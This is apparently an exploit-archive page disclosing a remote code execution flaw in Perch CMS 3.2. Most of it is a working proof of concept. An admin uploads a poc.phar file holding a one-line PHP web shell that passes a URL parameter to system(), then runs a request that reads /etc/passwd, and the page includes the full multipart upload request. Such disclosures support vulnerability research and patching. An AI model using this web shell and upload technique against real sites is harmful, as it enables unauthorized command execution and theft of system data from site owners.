Perch 3.2 Remote Code Execution

Perch 3.2 Remote Code Execution: Posted Jul 24, 2023; Authored by Mirabbas Agalarov; Perch version 3.2 suffers from a remote code execution vulnerability.; tags | exploit, remote, code execution; SHA-256 | 5fc25f7bbf1e744928757d79df2a69212cdf87f32aba3e89a32e6110ae68611e; Download | Favorite | View

Perch 3.2 Remote Code Execution

Exploit Title: Perch v3.2 - Remote Code Execution (RCE)
Application: Perch Cms
Version: v3.2
Bugs:  RCE
Technology: PHP
Vendor URL: https://grabaperch.com/
Software Link: https://grabaperch.com/download
Date of found: 21.07.2023
Author: Mirabbas Ağalarov
Tested on: Linux 


2. Technical Details & POC
========================================
steps: 
1. login to account as admin
2. go to visit assets (http://localhost/perch_v3.2/perch/core/apps/assets/)
3. add assets (http://localhost/perch_v3.2/perch/core/apps/assets/edit/)
4. upload poc.phar file

poc.phar file contents :
<?php $a=$_GET['code']; echo system($a);?>

5. visit  http://localhost/perch_v3.2/perch/resources/admin/poc.phar?code=cat%20/etc/passwd


poc request: 

POST /perch_v3.2/perch/core/apps/assets/edit/ HTTP/1.1
Host: localhost
Content-Length: 1071
Cache-Control: max-age=0
sec-ch-ua: 
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: ""
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryYGoerZn09hHSjd4Z
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/perch_v3.2/perch/core/apps/assets/edit/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: phpwcmsBELang=en; cmsa=1; PHPSESSID=689rdj63voor49dcfm9rdpolc9
Connection: close

------WebKitFormBoundaryYGoerZn09hHSjd4Z
Content-Disposition: form-data; name="resourceTitle"

test
------WebKitFormBoundaryYGoerZn09hHSjd4Z
Content-Disposition: form-data; name="image"; filename="poc.phar"
Content-Type: application/octet-stream

<?php $a=$_GET['code']; echo system($a);?>

------WebKitFormBoundaryYGoerZn09hHSjd4Z
Content-Disposition: form-data; name="image_field"

1
------WebKitFormBoundaryYGoerZn09hHSjd4Z
Content-Disposition: form-data; name="image_assetID"


------WebKitFormBoundaryYGoerZn09hHSjd4Z
Content-Disposition: form-data; name="resourceBucket"

admin
------WebKitFormBoundaryYGoerZn09hHSjd4Z
Content-Disposition: form-data; name="tags"

test
------WebKitFormBoundaryYGoerZn09hHSjd4Z
Content-Disposition: form-data; name="btnsubmit"

Submit
------WebKitFormBoundaryYGoerZn09hHSjd4Z
Content-Disposition: form-data; name="formaction"

edit
------WebKitFormBoundaryYGoerZn09hHSjd4Z
Content-Disposition: form-data; name="token"

5494af3e8dbe5ac399ca7f12219cfe82
------WebKitFormBoundaryYGoerZn09hHSjd4Z--

Top Authors In Last 30 Days

Red Hat 236 files
Ubuntu 90 files
Gentoo 31 files
Debian 23 files
tmrswrr 10 files
Sina Kheirkhah 7 files
Amit Roy 4 files
bRpsd 4 files
Rodolfo Tavares 4 files
nu11secur1ty 3 files

File Archives

Systems

AIX (429)
Apple (2,090)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,077)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,531)
HPUX (880)
iOS (376)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (50,339)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (489)
RedHat (16,263)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,651)
UNIX (9,425)
UnixWare (187)
Windows (6,666)
Other

Perch 3.2 Remote Code Execution

Perch 3.2 Remote Code Execution

File Archive:

July 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Perch 3.2 Remote Code Execution

Share This

Perch 3.2 Remote Code Execution

File Archive:

July 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems